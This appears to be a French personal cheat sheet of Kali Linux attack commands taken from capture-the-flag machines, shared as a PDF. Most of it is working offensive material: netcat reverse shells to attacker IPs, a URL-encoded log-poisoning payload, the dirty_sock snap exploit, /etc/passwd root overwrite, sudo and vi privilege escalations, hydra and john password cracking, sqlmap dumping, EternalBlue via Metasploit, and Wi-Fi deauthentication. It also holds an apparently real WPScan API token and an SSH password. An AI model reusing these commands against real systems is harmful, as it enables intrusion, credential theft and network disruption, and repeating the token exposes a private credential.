virtualbox : langue L='fr' && sudo sed -i 's/XKBLAYOUT=\"\w*"/XKBLAYOUT=\"'$L'\

virtualbox : langue L='fr' && sudo sed -i 's/XKBLAYOUT=\"\w*"/XKBLAYOUT=\"'$L'\"/g' /etc/default/keyboard regler le shell python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm cewl http:// 192.168.0.15======================================================================= ================================================================================== sort Bureau/fsocity.dic | uniq > passwords.txt w====== suprimer d oublons fichjier wc -l passwords.txt =================================================================================== ========================================= PHOTO exif .photo.png <================== pour info cacher dans phptp exiftool photo.png <================== pour info cacher dans phptp strings -n 10 photo.png <================== pour info cacher dans phptp si on vois des @@@@@@ steghide extact -sf photo.png <================== pour info cacher dans phptp strings /root/Bureau/photo.png <================== pour info cacher dans phptp steghide extract -sf /root/Bureau/cute-alien.jpg <======= recuperer fichier chacher binwalk -e /root/Bureau/cutie.png <======== extrait dossier hash-identifier ef680bb740692240059420b2c17db8f3 =================================================================================== ========================================= RECONNAISSSANCE NMAP && vulscan nmap -sV -Pn --script=vulscan/vulscan.nse 10.10.252.82 <=============== installer script vulscan github git clone https://github.com/scipag/vulscan scipag_vulscan ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan ============================================================== rustscan -a 192.168.0.23 --ulimit 5000 rustscan -b 500 -T 1500 rustscan -a 10.10.133.150 -p 22 -- -sV nmap 10.10.95.251 -vvv -p 1000 nmap -A -sV -T4 10.10.173.239 =================================================================================== ====================================== WPSCAN cherche vulnerability : wpscan --api-token=sebaXa7um3LFrOnAI4pTZH9RxfVMx7rf4NOCqz6fAtU --url=http://192.168.0.29/blog -e p --plugins-detection aggressive wpscan --url 192.168.0.29/0/ -e u <============== repertoire normale wpscan --url 192.168.0.29/blog/ --wp-content-dir http://10.10.96.242/wp-content <============= specifier repetoire /0/ wpscan --url 10.10.96.242/0/ --wp-content-dir http://10.10.96.242/wp-content -e u <================= enumerate user wpscan --url http://192.168.0.29/blog/wp-login.php -U users.txt -P /root/rockyou.txt <====== crack mot de passe sans autre repertoire wpscan --url http://192.168.0.29/blog/ --wp-content-dir http://192.168.0.29/wp- content -U users.txt -P /root/directory_only_one.small.txt <====== crack mot de passe pour le shell ==> trouver la page 404 editer la page avec le php et l executer avec le lien d la page activer netcat wpscan --api-token=sebaXa7um3LFrOnAI4pTZH9RxfVMx7rf4NOCqz6fAtU --url=http://192.168.0.29/blog -e p --plugins-detection aggressive <== trouve vulnerability ============================================================== DIBUSTER GOBUSTER NIKTO DIRSEARCH wfuzz ffuf ffuf -u http://192.168.0.27/FUZZ -w /usr/share/wordlists/dirbuster/directory-list- 2.3-medium.txt gobuster dir -u http://192.168.0.27 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt rustscan -a 10.10.136.242 dirb http://10.10.133.150 nikto -h 10.10.133.150 dirseach http://10.10.133.150 wfuzz --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.0.23/FUZZ wfuzz -u "http://192.168.0.27/secret//evil.php?FUZZ=../../../../etc/passwd" -w /usr/share/wordlists/rockyou.txt --hw 0 http://192.168.0.27/blog-post/archives/randylogs enumerer workgroup info sudo enum4linux -a 10.10.133.17 | tee enum4linux.log ls -la =================================================================================== ========================================= faille php ouvrir netcat nc -e /bin/sh 192.168.0.27 9999 http://192.168.0.27/blog-post/archives/randylogs.php?file=/var/log/auth.log&&cmd= encoder url sur le site https://www.urlencoder.org/ resulat ceci est un payload =============> http://192.168.0.27/blog-post/archives/randylogs.php?file=/var/log/ auth.log&&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin %2Fsh%20-i%202%3E%261%7Cnc%20192.168.0.17%209999%20%3E%2Ftmp%2Ff =================================================================================== ============================================= ESCALATION PRIVILEGGE TROUVER FICHIER PERMITION find / -user root -perm -4000 -print 2>/dev/null INVITE DE COMMANDE : sudo -l su nom_machine ne marche pas faire python -c 'import pty; pty.spawn ("/bin/bash")' =================================================================================== ========================================= /etc/passwd si on peux ecrire nano /etc/passwd openssl passwd password12345 resultat : XggPJs2G6AtZk copier coller XggPJs2G6AtZk dan /etc/passwd ligne root effacer x entre les deux point coller quitter tapper su root et mot de passe generer =================================================================================== =============================================== sudo -l Matching Defaults entries for randy on corrosion: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User randy may run the following commands on corrosion: (root) PASSWD: /home/randy/tools/easysysinfo cd /home/randy/tools/ cp /usr/bin/bash . cp bash easysysinfo sudo /home/randy/tools/easysysinfo =================================================================================== ========================================================= FAILLE AVEC VI escalate avec vi editeur de texte :::: etre loger en tant de utilisateur sudo -u#-1 /usr/bin/vi /home/charlie/user.txt escale priv ouvre vi editeur de texte ouvrir shell :!/bin/sh =================================================================================== ========================================= faile /bin/snap voir avec sudo -l python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/////// /// xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29j ayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUs wU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi 9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMO kFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1t YXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l 0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbm ZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngA P8AXF0ABIAerFoU8J/ e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/ XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/ Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkC jEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPt vjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAA AAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d -d > leet.snap sudo /usr/bin/snap install --devmode leet.snap su dirty_sock mot de passe dirty_sock sudo i mot de passe dirty_sock gagner =================================================================================== ========================================= faile /usr/bin/nom de la machine : entrer dans le shell ===> sudo /usr/bin/nom de la machine uname -a nom de la machine resultat $ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin echo *un9player* >> exec sudo bountyhacker exec --exec "exec '/bin/sh -i' " resultat # id uid=0(root) gid=0(root) groups=0(root) bingo cd /root ======================================================================== sudo-l (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl cat /home/itguy/backup.pl cat /etc/copy.sh ouvrir netcat sur le port 4444 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.34 4444 >/tmp/f" > /etc/copy.sh sudo /usr/bin/perl /home/itguy/backup.pl =================================================================================== ========================================= CVE-2019-14287 Matching Defaults entries for james on agent-sudo: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User james may run the following commands on agent-sudo: (ALL, !root) /bin/bash sudo -l quand tu vois ca la comande et la sudo -u #-1 /bin/bash mote de passe sshpass -p 'hackerrules!' ssh james@10.10.182.246 =================================================================================== ================================================================= COPIE LINPEAS A TRAVERS SSH garder ssh ouvert : ouvrir atre shell normal pad dans sssh cd /dev/shm scp ~/Bureau/privilege/linPEAS/linpeas.sh james@10.10.182.246:/dev/shm escalate priv a travers ssh garder ssh ouver et de ton terminal tu cole la commande scp ca telecharge linpeas dans le dossierdev/shm cd /dev/shm chmod +x linpeas.sh ./linpeas.sh /home/brucetherealadmin/Bureau/privilege/linPEAS/linpeas.sh une fois la clé ssh trouver la metre dans un ficher key_id_rsa ce conecter a l adresse ssh -i key_id_rsa charlie@10.10.10.10 et le shell et ouvert scp /root/privilege/linPEAS/linpeas.sh =================================================================================== ========================================= COSTRUIRE CLÉ RSA_SSH nano nom_id_rsa sudo chmod 600 kay_id_rsa charlie@10.10.62.35 CRACK MOT DE PASS HASHE RSA_KEY /// JHON RIPPER https://m0053sec.wordpress.com/2020/02/08/using-john-ssh2john-to-crack-a- id_rsa-private-key/ sudo /usr/share/john/ssh2john.py pingu_id_rsa crack mo de passe rsa_key Commande : john ~/Desktop//hash/hash.txt -w /usr/share/wordlists/rockyou.txt cp /usr/share/john/ssh2john.py ~/Bureau/M0053/ssh2john.py CREE DOSSIER M0053 ET METTRE ssh2john.py DANS DOSSIER BUREAU python ssh2john.py kay_id_rsa > id_rsa.hash sudo john kay_id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt metre le hache dans le meme dosser que ssh2jhon.py sudo john kay_id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt ~/Bureau/M0053 sudo ssh -i kay_id_rsa kay@10.10.82.103 =================================================================================== ========================================= sudo-l (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl cat /home/itguy/backup.pl cat /etc/copy.sh ouvrir netcat sur le port 4444 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.34 4444 >/tmp/f" > /etc/copy.sh sudo /usr/bin/perl /home/itguy/backup.pl =================================================================================== ========================================= CRAK HASH ,IP , PASSWORD sudo john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt CRACK HASHES john --format=raw-md5 --wordlist=/rootrockyou.txt /root/hashrobot.txt <========= md5 crack hash hashcat -m 7900 hashcharlie.txt /usr/share/wordlists/rockyou.txt hashcat -m 0 /root/Bureau/hashrobot.txt /usr/share/wordlists/rockyou.txt <========= md5 hashcat --show hashrobot.txt /usr/share/wordlists/rockyou.txt <============= voir le hash BRUTE FORCE FTP hydra -l gwendoline -P fdp.txt ftp://10.10.232.202 /usr/sbin/zip2john 8702.zip > hashes_for_john.txt <======= crack mot de passe zip john hashes_for_john.txt /usr/share/wordlists/rockyou.txt <=======crack hashe john hashes_for_john.txt -wordlist=/usr/share/wordlists/rockyou.txt <=======crack hashe =================================================================================== ========================================= ETERNELBLUE FAILLE METASLPOIT set payload windows/x64/shell/reverse_tcp set RHOSTS 10.10.7.113 set LHOST 10.9.0.34 run post/multi/recon/local_exploit_suggester timestomp =================================================================================== ========================================= dir C:\*.txt /A /N /S /O:G windows VOIR TOUT CONTENUE DOSSIER TXT find / -name "s3cr3t*" 2>/dev/null linux =================================================================================== ========================================= SQLMAP sqlmap -u http://10.10.111.64/simple/admin/login.php --forms <===== forms donne le nomes des table sqlmap -u http://10.10.95.251/simple/admin/login.php --forms --dump (InnoDB) <==== nom de l table =================================================================================== ========================================= SEARCHPLOIT searchsploit NOM SERVICE VERSION searchsploit -m php/webapps/46635.py <====== CRÉ L EXPLOIT Path: /usr/share/exploitdb/exploits/php/webapps/46635.py nAno 46635.py regarder l exploit changer chmod +x +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++ HYDRA +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CRACK session panel website hydra -l alan -P /usr/share/wordlists/rockyou.txt 192.168.0.254 http-post-form "/login.php:login.php:username=admin&password=^PASS^:Invalid Password" hydra -l H4x0r -P /usr/share/wordlists/rockyou.txt ssh : //10.10.7.139 <+++++++++++ + CRAK SSH =================================================================================== ========================================= TRANSFERT DONNE DEPUIS UN SHELL OUVIR SUR KALI : ce metre dans le dossier de privilege linpeas python -m SimpleHTTPServer 8080 wget http://10.9.3.94:8080/linpeas.sh <========depuis le shell smbclient //10.10.26.144/anonymous rdesktop 10.10.68.218 -u dark -p Password01! EXPORT IP=10.10.10.10 scp james@10.10.109.12:/home/james/Alien_autospy.jpg -j <========== telecharger ficher ssh =)================================================================================= ================================================== WIFI =================================================================================== ==================================================== airodump-ng wlan0mon airodump-ng --bssid F4:CA:E5:AC:6F:B0 --channel 2 --write hs-wpa wlan0mon aireplay-ng --deauth 10 -a 30:7C:B2:13:3E:13 -c 40:9F:38:BA:EB:AF -D wlan0 victime client conecter aireplay-ng hs-wpa-02.cap -w /usr/share/wordlists/rockyou.txt uploads/s1/ comande-kali.pdf

  • 30
  • 0
  • 0
Afficher les détails des licences
Licence et utilisation
Gratuit pour un usage personnel Attribution requise
Partager
  • Détails
  • Publié le Sep 13, 2022
  • Catégorie Administration
  • Langue French
  • Taille du fichier 0.0311MB